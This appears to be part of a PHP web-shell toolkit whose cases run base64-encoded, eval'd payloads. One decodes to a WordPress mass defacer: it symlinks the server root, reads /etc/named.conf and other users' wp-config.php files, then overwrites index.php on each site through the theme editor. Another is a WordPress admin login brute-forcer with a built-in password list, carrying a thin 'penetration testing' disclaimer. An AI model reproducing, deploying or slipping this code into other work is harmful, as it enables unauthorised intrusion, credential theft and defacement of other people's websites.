IHR5cGU9ImhpZGRlbiIgaWQ9Il93cG5vbmNlIiBuYW1lPSJfd3Bub25jZSIgdmFsdWU9IicsJyIgLz4nKTsNCiAgICAgICAgJF9maWxlID0gZW50cmUydjIoJGJ1ZmZlcjAsJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImZpbGUiIHZhbHVlPSInLCciIC8+Jyk7DQoNCiAgICAgICAgaWYoc3Vic3RyX2NvdW50KCRfZmlsZSwiL2luZGV4LnBocCIpICE9IDApew0KICAgICAgICAgICAgJG91dHB1dC49ICJbK10gaW5kZXgucGhwIE9wZW5lZDxiciAvPiI7DQogICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAkb3V0cHV0Lj0gIlstXSBpbmRleC5waHAgVW5hYmxlIHRvIG9wZW48YnIgLz4iOw0KICAgICAgICB9DQoNCiAgICAgICAgJHVybDI9JHNpdGVfdXJsLiIvd3AtYWRtaW4vdGhlbWUtZWRpdG9yLnBocCI7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwyKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywibmV3Y29udGVudD0iLiRjb250ZW50LiImYWN0aW9uPXVwZGF0ZSZmaWxlPSIuJF9maWxlLiImX3dwbm9uY2U9Ii4kX3dwbm9uY2UuIiZzdWJtaXQ9VXBkYXRlIEZpbGUiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkdXNlcmFnZW50KTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgIkNPT0tJRS50eHQiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICJDT09LSUUudHh0Iik7DQogICAgICAgICRidWZmZXIgPSBjdXJsX2V4ZWMoJGNoKTsNCiAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KDQogICAgICAgICRwb3MgPSBzdHJwb3MoJGJ1ZmZlciwnPGRpdiBpZD0ibWVzc2FnZSIgY2xhc3M9InVwZGF0ZWQiPicpOw0KICAgICAgICAkY29uZCA9IDA7DQogICAgICAgIGlmKCRwb3MgPT09IGZhbHNlKSB7DQogICAgICAgICAgICAkb3V0cHV0Lj0gIlstXSBpbmRleC5waHAgRmFpbGVkPGJyIC8+IjsNCiAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICRvdXRwdXQuPSAiWytdIGluZGV4LnBocCBGYWlsZWQrPGJyIC8+IjsNCiAgICAgICAgICAgICRjb25kID0gMTsNCiAgICAgICAgfSB9IGVsc2Ugew0KICAgICAgICAkb3V0cHV0Lj0gIlstXSBEQiBFcnJvcjxiciAvPiI7DQogICAgfQ0KICAgIGdsb2JhbCAkYmFzZV9wYXRoOw0KICAgIHVubGluaygkYmFzZV9wYXRoLidDT09LSUUudHh0Jyk7DQogICAgcmV0dXJuIGFycmF5KCdjb25kJz0+JGNvbmQsICdvdXRwdXQnPT4kb3V0cHV0KTsNCn0NCg0KZnVuY3Rpb24gZXhlY19tb2RlXzEoJGRlZl91cmwpIHsNCg0KICAgIEBta2Rpcignc3ltJywwNzc3KTsNCiAgICAkd3IgID0gIk9wdGlvbnMgYWxsIFxuIERpcmVjdG9yeUluZGV4IFN1eC5odG1sIFxuIEFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIFxuIEFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwIFxuICBBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwgXG4gQWRkSGFuZGxlciB0eHQgLmh0bWwgXG4gUmVxdWlyZSBOb25lIFxuIFNhdGlzZnkgQW55IjsNCiAgICAkZnAgPSBAZm9wZW4gKCdzeW0vLmh0YWNjZXNzJywndycpOw0KICAgIGZ3cml0ZSgkZnAsICR3cik7DQogICAgQHN5bWxpbmsoJy8nLCdzeW0vcm9vdCcpOw0KICAgICRkb21pbmlvcyA9IEBmaWxlX2dldF9jb250ZW50cygiL2V0Yy9uYW1lZC5jb25mIik7DQogICAgQHByZWdfbWF0Y2hfYWxsKCcvLio/em9uZSAiKC4qPykiIHsvJywgJGRvbWluaW9zLCAkb3V0KTsNCiAgICAkb3V0WzFdID0gYXJyYXlfdW5pcXVlKCRvdXRbMV0pOw0KICAgICRudW1lcm9fZG9taW5pb3MgPSBjb3VudCgkb3V0WzFdKTsNCiAgICBlY2hvICJUb3RhbCBXZWJzaXRlczogJG51bWVyb19kb21pbmlvcyA8YnI+PGJyIC8+IjsNCiAgICAkZGVmID0gZmlsZV9nZXRfY29udGVudHMoJGRlZl91cmwpOw0KICAgICRkZWYgPSB1cmxlbmNvZGUoJGRlZik7DQogICAgJGJhc2VfdXJsID0gJ2h0dHA6Ly8nLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLmRpcm5hbWUoJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pLicvc3ltL3Jvb3QvaG9tZS8nOw0KICAgICRvdXRwdXQgPSBmb3BlbignZGVmYWNlZC5odG1sJywgJ2ErJyk7DQogICAgJF9TRVNTSU9OWydjb3VudDEnXSA9IChpc3NldCgkX0dFVFsnc3QnXSkgJiYgJF9HRVRbJ3N0J10hPScnKSA/IChpc3NldCgkX1NFU1NJT05bJ2NvdW50MSddKSA/ICRfU0VTU0lPTlsnY291bnQxJ10gOjAgKSA6IDA7DQogICAgJF9TRVNTSU9OWydjb3VudDInXSA9IChpc3NldCgkX0dFVFsnc3QnXSkgJiYgJF9HRVRbJ3N0J10hPScnKSA/IChpc3NldCgkX1NFU1NJT05bJ2NvdW50MiddKSA/ICRfU0VTU0lPTlsnY291bnQyJ10gOjAgKSA6IDA7DQogICAgZWNobyAnPHRhYmxlIHN0eWxlPSJ3aWR0aDo3NSU7Ij48dHIgc3R5bGU9ImJhY2tncm91bmQ6cmdiYSgxNjAsIDgyLCA0NSwwLjYpOyI+PHRoPklEPC90aD48dGg+U0lEPC90aD48dGg+RG9tYWluPC90aD48dGg+U2NyaXB0PC90aD48dGg+UHJvY2VzczwvdGg+PHRoPlJlc3VsdHM8L3RoPjwvdHI+JzsNCiAgICAkaiA9IDE7DQogICAgJHN0ID0gKGlzc2V0KCRfR0VUWydzdCddKSAmJiAkX0dFVFsnc3QnXSE9JycpID8gJF9HRVRbJ3N0J10gOiAwOw0KICAgIGZvcigkaSA9ICRzdDsgJGkgPD0gJG51bWVyb19kb21pbmlvczsgJGkrKykNCiAgICB7DQogICAgICAgICRkb21haW4gPSAkb3V0WzFdWyRpXTsNCiAgICAgICAgJGRvbm9fYXJxdWl2byA9IEBmaWxlb3duZXIoIi9ldGMvdmFsaWFzZXMvIi4kZG9tYWluKTsNCiAgICAgICAgJGluZm9zID0gQHBvc2l4X2dldHB3dWlkKCRkb25vX2FycXVpdm8pOw0KICAgICAgICANCiAgICAgICAgJGNvbmZpZzAyID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRiYXNlX3VybC4kaW5mb3NbJ25hbWUnXS4iL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAiKTsNCg0KICAgICAgICAkY2xzID0gKCRqICUgMiA9PSAwKSA/ICdjbGFzcz0iZXZlbiInIDogJ2NsYXNzPSJvZGQiJzsNCg0KICAgICAgICBpZigkY29uZmlnMDIgJiYgcHJlZ19tYXRjaCgnL0RCX05BTUUvaScsJGNvbmZpZzAyKSl7DQogICAgICAgICAgICBlY2hvICc8dHIgJy4kY2xzLic+PHRkIGFsaWduPSJjZW50ZXIiPicuKCRqKyspLic8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4nLiRpLic8L3RkPjx0ZD48YSBocmVmPSJodHRwOi8vJy4kZG9tYWluLiciIHRhcmdldD0iYmxhbmsiPicuJGRvbWFpbi4nPC9hPjwvdGQ+JzsNCiAgICAgICAgICAgIGVjaG8gJzx0ZCBhbGlnbj0iY2VudGVyIj48Zm9udCBjb2xvcj0ieWVsbG93Ij5XT1JEUFJFU1M8L2ZvbnQ+PC90ZD4nOw0KICAgICAgICAgICAgJHJlcyA9IGluZGV4X2NoYW5nZXJfd3AoJGNvbmZpZzAyLCAkZGVmKTsNCiAgICAgICAgICAgIGVjaG8gJzx0ZD4nLiRyZXNbJ291dHB1dCddLic8L3RkPic7DQogICAgICAgICAgICBpZigkcmVzWydjb25kJ10pIHsNCiAgICAgICAgICAgICAgICBlY2hvICc8dGQgYWxpZ249ImNlbnRlciI+PHNwYW4gY2xhc3M9ImdyZWVuIj5IQUNLRUQ8L3NwYW4+PC90ZD4nOw0KICAgICAgICAgICAgICAgIGZ3cml0ZSgkb3V0cHV0LCAnaHR0cDovLycuJGRvbWFpbi4iPGJyPiIpOw0KICAgICAgICAgICAgICAgICRfU0VTU0lPTlsnY291bnQyJ10gPSAkX1NFU1NJT05bJ2NvdW50MiddICsgMTsNCiAgICAgICAgICAgIH0gZWxzZSB7DQogICAgICAgICAgICAgICAgZWNobyAnPHRkIGFsaWduPSJjZW50ZXIiPjxzcGFuIGNsYXNzPSJyZWQiPnVuc3VjY2Vzc2Z1bDwvc3Bhbj48L3RkPic7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlY2hvICc8L3RyPic7DQogICAgICAgIH0NCiAgICB9DQogICAgZWNobyAnPC90YWJsZT4nOw0KICAgIGVjaG8gJzxoci8+JzsNCiAgICBlY2hvICdUb3RhbCBEZWZhY2UgPSAnLigkX1NFU1NJT05bJ2NvdW50MSddKyRfU0VTU0lPTlsnY291bnQyJ10pLic8YnIgLz4nOw0KICAgIGVjaG8gJzxhIGhyZWY9ImRlZmFjZWQuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiPkxpc3QgV2Vic2l0ZXMgRGVmYWNlZDwvYT48YnIgLz4nOw0KfQ0KDQplY2hvICc8IURPQ1RZUEUgaHRtbD4NCjxodG1sPg0KDQo8aGVhZD4NCg0KICAgIDx0aXRsZT48L3RpdGxlPg0KICAgIA0KCTxwPg0KCTxoMiBzdHlsZT0iY29sb3I6I0ZGMDAwMDt0ZXh0LWFsaWduOiBjZW50ZXI7Ij5Xb3JkcHJlc3MgTWFzcyBEZWZhY2VyIFByaXZhdGU8L2gyPg0KCTxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQogICAgICAgIGJvZHkge2JhY2tncm91bmQtcG9zaXRpb246IDUwJSA1MCU7DQoJY29sb3I6IHdoaXRlOyAJZm9udC1mYW1pbHk6ICJUcmVidWNoZXQgTVMiLEFyaWFsOwltYXJnaW46MDsJcGFkZGluZzowOw0KCWJhY2tncm91bmQtY29sb3I6ICMwMDA7DQoJYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCn0NCiAgICAgICAgLmhlYWRlciB7cG9zaXRpb246Zml4ZWQ7d2lkdGg6MTAwJTt0b3A6MDtiYWNrZ3JvdW5kOiMwMDA7fQ0KICAgICAgICAuZm9vdGVyIHtwb3NpdGlvbjpmaXhlZDt3aWR0aDoxMDAlO2JvdHRvbTowO2JhY2tncm91bmQ6IzAwMDt9DQogICAgICAgIGlucHV0W3R5cGU9InN1Ym1pdCJdeyAxcHggc29saWQgIzAwMDAwMDt9DQogICAgICAgIGlucHV0W3R5cGU9InN1Ym1pdCJdOmhvdmVye2NvbG9yOlNlYVNoZWxsO30NCiAgICAgICAgaW5wdXRbdHlwZT0icmFkaW8iXXttYXJnaW4tdG9wOiAwO30NCiAgICAgICAgLmV2ZW4ge2JhY2tncm91bmQtY29sb3I6IHJnYmEoMjUsIDI1LCAyNSwgMC42KTt9DQogICAgICAgIC5vZGQge2JhY2tncm91bmQtY29sb3I6IHJnYmEoMTAyLCAxMDIsIDEwMiwgMC42KTt9DQogICAgICAgIGEge2NvbG9yOiNmZmY7fSBhOmhvdmVyIHtjb2xvcjojMDBCRkZGO30NCiAgICAgICAgZmllbGRzZXR7Ym9yZGVyOiAxcHggc29saWQgZ3JleTsgYmFja2dyb3VuZDogcmdiYSgwLDAsMCwwLjcpOyB3aWR0aDogNjAwcHg7IG1hcmdpbjogMCBhdXRvO21pbi1oZWlnaHQ6MjQwcHg7fQ0KICAgICAgICB0ZXh0YXJlYXtiYWNrZ3JvdW5kOiByZ2JhKDAsMCwwLDAuNik7IGNvbG9yOiB3aGl0ZTt9DQogICAgICAgIC5ncmVlbiB7Y29sb3I6IzAwRkYwMDtmb250LXdlaWdodDpib2xkO30NCiAgICAgICAgLnJlZCB7Y29sb3I6I0ZGMDAwMDtmb250LXdlaWdodDpib2xkO30NCiAgICAgICAgLmtpbGxtZSB7cG9zaXRpb246IGZpeGVkOyB0b3A6IDIwcHg7IHJpZ2h0OiAyMHB4OyBib3JkZXI6IDJweCBzb2xpZCB5ZWxsb3c7IHBhZGRpbmc6IDEwcHg7IGZvbnQtc2l6ZTogMjBweDsgY29sb3I6IHJlZDsgZm9udC13ZWlnaHQ6IGJvbGQ7fQ0KICAgIDwvc3R5bGU+PC9wPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCiAgICAgICAgZnVuY3Rpb24gY2hhbmdlKCkgew0KICAgICAgICAgICAgaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCdyY2RcJykuY2hlY2tlZCA9PSB0cnVlKSB7DQogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCd0cmFcJykuc3R5bGUuZGlzcGxheSA9IFwnXCc7DQogICAgICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKFwndHJhXCcpLnN0eWxlLmRpc3BsYXkgPSBcJ25vbmVcJzsNCiAgICAgICAgICAgIH0NCiAgICAgICAgfQ0KICAgICAgICBmdW5jdGlvbiBoaWRlKCkgew0KICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoXCd0cmFcJykuc3R5bGUuZGlzcGxheSA9IFwnbm9uZVwnOw0KICAgICAgICB9DQogICAgPC9zY3JpcHQ+DQo8L2hlYWQ+DQo8Ym9keT4NCjxkaXYgY2xhc3M9ImZvb3RlciI+DQogICAgPGgzIHN0eWxlPSJ0ZXh0LWFsaWduOiBjZW50ZXI7Ij4mbmJzcDs8L2gzPg0KPC9kaXY+DQo8ZGl2IHN0eWxlPSJiYWNrZ3JvdW5kOiByZ2JhKDAsMCwwLDAuNSk7cGFkZGluZzo5MHB4IDAgNjVweCAwOyI+DQogICAgJzsNCiAgICBpZighaXNzZXQoJF9QT1NUWydmb3JtX2FjdGlvbiddKSl7DQogICAgZWNobyAnPGRpdiBhbGlnbj0iY2VudGVyIj4NCiAgICAgICAgPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+DQogICAgICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJmb3JtX2FjdGlvbiIgdmFsdWU9IjEiPjxicj5pbmRleCB1cmw6DQoJCQk8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iaW5kZXhhZHJlc2kiIHZhbHVlPSJodHRwOi8vc2l0ZS5jb20vaW5kZXguaHRtbCIgLz48YnI+DQogICAgICAgICAgICA8aW5wdXQgY2xhc3M9c3VibWl0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IiEhIFNUQVJUICEhIiBuYW1lPSJTdWJtaXQiPg0KICAgICAgICA8L2Zvcm0+DQogICAgPC9kaXY+JzsNCiAgICB9IA0KICAgIGVjaG8gJzxkaXYgYWxpZ249ImNlbnRlciI+JzsNCiAgICBpZigkX1BPU1RbJ2Zvcm1fYWN0aW9uJ10gPT0gMSkgew0KICAgICAgICAgICAgZXhlY19tb2RlXzEoJF9QT1NUWydpbmRleGFkcmVzaSddKTsNCiAgICB9DQogICAgZWNobyAnPC9kaXY+DQogICAgPC9kaXY+DQoJDQoJDQoJDQoJDQo8L2JvZHk+DQo8L2h0bWw+JzsNCj8+"));
  7266. break;
  7267. case "PHP_78":
  7268. eval(base64_decode("ZWNobyAiDQo8IS0tDQpXb3JkcHJlc3MgQWRtaW4gUGFuZWwgUGVuZXRyYXRpb24gVGVzdGluZw0KViAxDQpQUzogdGhpcyB0b29sIGlzIGZvciBwZW5ldHJhdGlvbiB0ZXN0aW5nIGFuZCBlZHVjYXRpb25hbCBwdXJwb3NlLCBodHRwOi8vd3d3LnY0LXRlYW0uY29tL2NjLyBpcyBub3QgcmVzcG9uc2libGUgYXQgYW55IGJhZCB1c2luZyBmb3IgdGhpcyB0b29sLg0KDQpUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTogeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQ0KaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSBhcyBwdWJsaXNoZWQgYnkNCnRoZSBGcmVlIFNvZnR3YXJlIEZvdW5kYXRpb24sIGVpdGhlciB2ZXJzaW9uIDMgb2YgdGhlIExpY2Vuc2UsIG9yDQooYXQgeW91ciBvcHRpb24pIGFueSBsYXRlciB2ZXJzaW9uLg0KLS0+DQoiOw0KDQplcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXRfdGltZV9saW1pdCgwKTsNCmlnbm9yZV91c2VyX2Fib3J0KHRydWUpOw0KPz4NCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+PC90aXRsZT4NCjxtZXRhIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvbnRlbnQ9dGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04IGNoYXJzZXQ9VVRGLTg+DQoNCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5IHsNCgljb2xvcjogd2hpdGU7DQoJfQ0KdGV4dGFyZWEgew0KCWJvcmRlci1yYWRpdXM6IDhweDsNCgljb2xvcjogd2hpdGU7DQoJYmFja2dyb3VuZC1jb2xvcjpibGFjazsNCn0NCmlucHV0W3R5cGU9c3VibWl0XSAsIC5zdWJtaXR7DQoJCWJhY2tncm91bmQtY29sb3I6YmxhY2s7DQoJCWNvbG9yOndoaXRlOw0KCQlib3JkZXItcmFkaXVzOjhweDsNCn0NCnAgew0KCWZvbnQtc2l6ZTogMTBweDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQp9DQphOmxpbmssYTpob3ZlcixhOnZpc2l0ZWQgew0KCWNvbG9yOnBpbms7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KPCEtLSB2NC10ZWFtIHwgV29yZFByZXNzIEFkbWluIFBhbmVsIFBlbmV0cmF0aW9uIFRlc3RpbmcgLS0+DQo8Y2VudGVyPg0KPHA+Jm5ic3A7PC9wPg0KPGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIj4NCiAgPHRhYmxlIHdpZHRoPSc2MjQnIGJvcmRlcj0nMCcgaWQ9J0JveCc+DQogICAgPHRyPg0KPHRkIHdpZHRoPSc0JSc+Jm5ic3A7PC90ZD4NCjx0ZCB3aWR0aD0iOTYlIiBjb2xzcGFuPSIzIiBhbGlnbj0iY2VudGVyIiA+PHA+V29yZFByZXNzIEFkbWluIFBhbmVsIFBlbmV0cmF0aW9uIFRlc3RpbmcgPC9wPjwvdGQ+DQo8L3RyPg0KICAgIDx0cj4NCiAgICAgIDx0ZCA+Jm5ic3A7PC90ZD4NCiAgICAgIDx0ZCA+PHA+SG9zdHM6PC9wPjwvdGQ+DQogICAgICA8dGQgPjxwPiBVc2Vyczo8L3A+PC90ZD4NCiAgICAgIDx0ZCA+PHA+UGFzc3dvcmRzOjwvcD48L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAgPHRkPiZuYnNwOzwvdGQ+DQogICAgICA8dGQgPjx0ZXh0YXJlYSBuYW1lPSJob3N0cyIgY29scz0iMzAiIHJvd3M9IjEwIiA+PD9waHAgaWYoJF9QT1NUKXtlY2hvICRfUE9TVFsnaG9zdHMnXTt9ID8+PC90ZXh0YXJlYT48L3RkPg0KICAgICAgPHRkID48dGV4dGFyZWEgbmFtZT0idXNlcm5hbWVzIiBjb2xzPSIzMCIgcm93cz0iMTAiICA+PD9waHAgaWYoJF9QT1NUKXtlY2hvICRfUE9TVFsndXNlcm5hbWVzJ107fWVsc2Uge2VjaG8gImFkbWluIjt9ID8+PC90ZXh0YXJlYT48L3RkPg0KICAgICAgPHRkID48dGV4dGFyZWEgbmFtZT0icGFzc3dvcmRzIiBjb2xzPSIzMCIgcm93cz0iMTAiICA+PD9waHAgaWYoJF9QT1NUKXtlY2hvICRfUE9TVFsncGFzc3dvcmRzJ107fWVsc2Uge2VjaG8gImFkbWluXG5hZG1pbmlzdHJhdG9yXG4xMjMxMjNcbjEyMzMyMVxuMTIzNDU2XG4xMjM0NTY3XG4xMjM0NTY3OFxuMTIzNDU2Nzg5XG4xMjM0NTYxMjM0NTZcbmFkbWluMjAxMFxuYWRtaW4yMDExXG5wYXNzd29yZFxuUEBzc1cwcmRcbiFAIyQlXlxuIUAjJCVeJiooXG4oKiZeJSQjQCFcbjExMTExMVxuMjIyMjIyXG4zMzMzMzNcbjQ0NDQ0NFxuNTU1NTU1XG42NjY2NjZcbjc3Nzc3N1xuODg4ODg4XG45OTk5OTkiO30gPz48L3RleHRhcmVhPjwvdGQ+DQogICAgPC90cj4NCjx0cj48dGQgY29sc3Bhbj0iNCI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ic3VibWl0IiB2YWx1ZT0iQnJ1dGUgTm93IiBjbGFzcz0ic3VibWl0IiAgLz4NCjw/cGhwDQppZigkX1BPU1QpDQp7DQoJJGhvc3RzID0gdHJpbShmaWx0ZXIoJF9QT1NUWydob3N0cyddKSk7DQoJJHBhc3N3b3JkcyA9IHRyaW0oZmlsdGVyKCRfUE9TVFsncGFzc3dvcmRzJ10pKTsNCgkkdXNlcm5hbWVzID0gdHJpbShmaWx0ZXIoJF9QT1NUWyd1c2VybmFtZXMnXSkpOw0KDQoJaWYoJHBhc3N3b3JkcyAmJiAkdXNlcm5hbWVzICYmICRob3N0cykNCgl7DQoJCSRob3N0c19leHBsb2RlID0gZXhwbG9kZSgiXG4iLCAkaG9zdHMpOw0KCQkkdXNlcm5hbWVzX2V4cGxvZGUgPSBleHBsb2RlKCJcbiIsICR1c2VybmFtZXMpOw0KICAgIAkkcGFzc3dvcmRzX2V4cGxvZGUgPSBleHBsb2RlKCJcbiIsICRwYXNzd29yZHMpOw0KDQoJCWZvcmVhY2goJGhvc3RzX2V4cGxvZGUgYXMgJGhvc3QpDQoJCXsNCgkJCSRob3N0ID0gUmVtb3ZlTGFzdFNsYXNoKCRob3N0KTsNCgkJCSRoYWNrZWQgPSAwOw0KCQkJJGhvc3QgPSBzdHJfcmVwbGFjZShhcnJheSgiaHR0cDovLyIsImh0dHBzOi8vIiwid3d3LiIpLCIiLHRyaW0oJGhvc3QpKTsNCgkJCSRob3N0ID0gImh0dHA6Ly8iLiRob3N0Ow0KCQkJJHdwQWRtaW4gPSAkaG9zdC4nL3dwLWFkbWluLyc7DQoNCgkJCWlmKCF1cmxfZXhpc3RzKCRob3N0LiIvd3AtbG9naW4ucGhwIikpDQoJCQl7ZWNobyAiPHA+Ii4kaG9zdC4iID0+IDxmb250IGNvbG9yPSdyZWQnPkVycm9yIEluIExvZ2luIFBhZ2UgITwvZm9udD48L3A+IjtvYl9mbHVzaCgpO2ZsdXNoKCk7Y29udGludWU7fQ0KDQoJCQlmb3JlYWNoKCR1c2VybmFtZXNfZXhwbG9kZSBhcyAkdXNlcm5hbWUpDQoJCQl7DQoJCQkJZm9yZWFjaCgkcGFzc3dvcmRzX2V4cGxvZGUgYXMgJHBhc3N3b3JkKQ0KCQkJCXsNCgkJCQkJJGNoICAgPSAgICAgY3VybF9pbml0KCk7DQoJCQkJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpOw0KCQkJCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJGhvc3QuJy93cC1sb2dpbi5waHAnKTsNCgkJCQkJY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfQ09PS0lFSkFSLCJjb2tpLnR4dCIpOw0KCQkJCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9DT09LSUVGSUxFLCJjb2tpLnR4dCIpOw0KCQkJCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwxKTsNCgkJCQkJY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfUE9TVCxUUlVFKTsNCgkJCQkJY3VybF9zZXRvcHQoJGNoLENVUkxPUFRfUE9TVEZJRUxEUywibG9nPSIuJHVzZXJuYW1lLiImcHdkPSIuJHBhc3N3b3JkLiImd3Atc3VibWl0PUdpcmkmIzgyMDc7Ii4iJnJlZGlyZWN0X3RvPSIuJHdwQWRtaW4uIiZ0ZXN0Y29va2llPTEiKTsNCgkJCQkJJGxvZ2luICAgID0JICAgY3VybF9leGVjKCRjaCk7DQoNCgkJCQkJaWYoZXJlZ2kgKCJwcm9maWxlLnBocCIsJGxvZ2luKSApDQoJCQkJCXsNCgkJCQkJCSRoYWNrZWQgPSAxOw0KCQkJCQkJZWNobyAiPHA+Ii4kaG9zdC4iID0+IFVzZXJOYW1lIDogWzxmb250IGNvbG9yPSdncmVlbic+Ii4kdXNlcm5hbWUuIjwvZm9udD5dIDogUGFzc3dvcmQgOiBbPGZvbnQgY29sb3I9J2dyZWVuJz4iLiRwYXNzd29yZC4iPC9mb250Pl08L3A+IjsNCgkJCQkJCW9iX2ZsdXNoKCk7Zmx1c2goKTticmVhazsNCgkJCQkJfQ0KCQkJCX0NCgkJCQlpZigkaGFja2VkID09IDEpe2JyZWFrO30NCgkJCX0NCgkJCWlmKCRoYWNrZWQgPT0gMCkNCgkJCXtlY2hvICI8cD4iLiRob3N0LiIgPT4gPGZvbnQgY29sb3I9J3JlZCc+RmFpbGVkICE8L2ZvbnQ+PC9wPiI7b2JfZmx1c2goKTtmbHVzaCgpO30NCgkJfQ0KCX0NCgllbHNlIHtlY2hvICI8cD48Zm9udCBjb2xvcj0ncmVkJz5BbGwgZmllbGRzIGFyZSBSZXF1aXJlZCAhIDwvZm9udD48L3A+Ijt9DQp9DQo/Pg0KPC90ZD48L3RyPg0KPC90YWJsZT48L2Zvcm0+DQoNCjwhLS0gdjQtdGVhbS5jb20gfCBXb3JkUHJlc3MgQWRtaW4gUGFuZWwgUGVuZXRyYXRpb24gVGVzdGluZyAtLT4NCjwvY2VudGVyPg0KPHA+DQogIDw/cGhwDQpmdW5jdGlvbiB1cmxfZXhpc3RzKCRzdHJVUkwpDQp7DQogICAgJHJlc1VSTCA9IGN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRyZXNVUkwsIENVUkxPUFRfVVJMLCAkc3RyVVJMKTsNCiAgICBjdXJsX3NldG9wdCgkcmVzVVJMLCBDVVJMT1BUX0JJTkFSWVRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkcmVzVVJMLCBDVVJMT1BUX0hFQURFUkZVTkNUSU9OLCAnY3VybEhlYWRlckNhbGxiYWNrJyk7DQogICAgY3VybF9zZXRvcHQoJHJlc1VSTCwgQ1VSTE9QVF9GQUlMT05FUlJPUiwgMSk7DQogICAgY3VybF9leGVjICgkcmVzVVJMKTsNCiAgICAkaW50UmV0dXJuQ29kZSA9IGN1cmxfZ2V0aW5mbygkcmVzVVJMLCBDVVJMSU5GT19IVFRQX0NPREUpOw0KICAgIGN1cmxfY2xvc2UgKCRyZXNVUkwpOw0KICAgIGlmICgkaW50UmV0dXJuQ29kZSAhPSAyMDApe3JldHVybiBmYWxzZTt9DQoJZWxzZXtyZXR1cm4gdHJ1ZSA7fQ0KfQ0KZnVuY3Rpb24gZmlsdGVyKCRzdHJpbmcpDQp7DQoJaWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSAhPSAwKXtyZXR1cm4gc3RyaXBzbGFzaGVzKCRzdHJpbmcpOwl9DQoJZWxzZXtyZXR1cm4gJHN0cmluZzsJfQ0KfQ0KZnVuY3Rpb24gUmVtb3ZlTGFzdFNsYXNoKCRob3N0KQ0Kew0KCWlmKHN0cnJwb3MoJGhvc3QsICcvJywgLTEpID09IHN0cmxlbigkaG9zdCktMSkNCgl7cmV0dXJuIHN1YnN0cigkaG9zdCwwLHN0cnJwb3MoJGhvc3QsICcvJywgLTEpKTt9DQoJZWxzZXtyZXR1cm4gJGhvc3Q7fQ0KfQ0KPz48P3BocCAgZWNobyAiPC9wPiI7ID8+ICAgICAgICA="));
  7269. break;
  7270.  
  7271. }
  7272.  
  7273. ?>
  7274. <p class="style1">&nbsp;</p>
  7275. </body>
  7276. </html>
  7277.  
  7278.  
  7279.  
  7280. <head>
  7281. <style type="text/css">
  7282. .style1 {
  7283. text-align: center;
  7284. }
  7285.  
  7286. div.end
  7287. {
